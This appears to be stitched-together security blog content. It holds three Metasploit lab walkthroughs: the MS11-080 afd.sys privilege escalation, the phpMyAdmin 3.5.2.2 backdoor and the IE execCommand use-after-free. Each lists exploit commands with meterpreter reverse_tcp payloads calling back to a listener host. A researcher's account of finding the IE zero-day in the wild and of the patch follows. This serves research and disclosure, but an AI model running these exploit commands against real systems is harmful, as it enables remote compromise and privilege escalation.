Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Tested on Windows XP Pro SP3 with :
N/A
Description :
This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring it’s own token to avoid causing system instability.
Commands :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j
session -i 1
getuid
sysinfo
background
use exploit/windows/local/ms11_080_afdjoinleaf
set SESSION 1
exploit
session -i 2
sysinfo
getuid
phpMyAdmin-3.5.2.2-all-languages.zip downloaded from cdnetworks-kr-1 SourceForget.net mirror.
Tested on Ubuntu 11.10 i386 with :
phpMyAdmin-3.5.2.2-all-languages.zip
Description :
This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.
Commands :
use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit
sysinfo
getuid
Vulnerability found exploited in the wild and discovered by Eric Romang
First details of the vulnerability the 2012-09-14
Advanced details of the vulnerability provided by binjo the 2012-09-16
Metasploit PoC provided the 2012-09-17
IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7
Tested on Windows XP Pro SP3 with :
Internet Explorer 8
Description :
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.
Commands :
use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit
sysinfo
getuid
I can confirm, the zero-day season is really not over yet. Less than three weeks after the discovery of the Java SE 7 0day, aka CVE-2012-4681, potentially used by the Nitro gang in targeted attacks, a potential Microsoft Internet Explorer 7 and 8 zero-day is actually exploited in the wild.
First I would like to thanks the nice people (@binjo, @_sinn3r and all the guys of the Metasploit IRC channel on freenode) how helped me to understand and go further in my investigations.
Second, I would like to clarify some points:
I wasn’t a target of the 0day, I tested it on my lab. This misunderstanding has been introduced by Reuters in their press release.
I did these researches on my personal time, and these researches are not linked with my professional activities. This misunderstanding has been introduced by Reuters in their press release.
I don’t pin the responsibility on the Nitro gang, if you read my blog post, you will see that I found coincidences.
I don’t know the timeline of the vulnerability, including when it was discovered and how long it has been exploited.
Since the release of the Java SE 7 0day I was monitoring some of the infected servers used by the alleged Nitro gang (take a look at the updates at the end of the blog post). The 14th September morning, I discovered a “/public/help” folder on one of these servers, the Italian one (smile to @PhysicalDrive0).
As seen in the following screenshot, 4 files were hosted in this folder, and as a curious man, I downloaded everything to see what was related to these files.
I tested these files on an up-to-date Microsoft Windows XP Pro SP3 with an up-to-date Adobe Flash (11,4,402,265). Surprise they dropped files on my test computer (See demonstration video here under) ! A new 0day ? I decide then to take a deeper look at the grabbed files.
You can observe that the file is packed by DoSWF and that it is decompress in the memory. After decompression “Moh2010.swf” file is spraying the heap and eval an iframe to “Protect.html” file.
The ActionScript embedded in the original packed SWF file, is also interesting, you will see some special encoding (Chinese ?).
This file, during exploitation is also checking if the web site is present in Flash Website Storage Settings pannel to no more load the “Protect.html” file. This mean, that once infected the user will no more be exploited despite further visites to the web site.
The guys how developed this new 0day were not happy to have been catched, they just removed all the files from the source server 2 days after my discovery. But also more interesting the also removed a Java 0day variant from other folders.
Also I submitted all these stuff to different person in order to confirm the strangeness of this exploit, and we got some good return.
AlienVault Labs has provide more details on the potential source of the attack.
It seems the guys behind this 0day were targeting specific industries. We’ve seen that they compromised a news site related to the defense industry and they created a fake domain related to LED technologies that can be used to perform spearphishing campaigns to those industries.
Wednesday 09/19:
AlienVault Labs has report variant of the “Protect.html” file, named “Dodge.html” how is now also infecting Windows 7 32 bits running Java6 with Internet Explorer 9, and confirm the usage of the 0day in targeted attacks.
Microsoft propose a Fix it KB2757760 solution, “Prevent Memory Corruption via ExecCommand in Internet Explorer“, that prevents exploitation of this issue.
Microsoft has publish an advanced notification “Microsoft Security Bulletin Advance Notification for September 2012” for one out-of-band security bulletin that Microsoft is intending to release on September 21, 2012. The bulletin will addresses security vulnerabilities in Internet Explorer. The vulnerability is also affecting Internet Explorer on Windows Server 2003 and 2008.
Friday 09/21:
Microsoft has release the promised update MS12-063 in order to fix the 0day vulnerability. If you use Internet Explorer, I advice you to update as soon as possible !
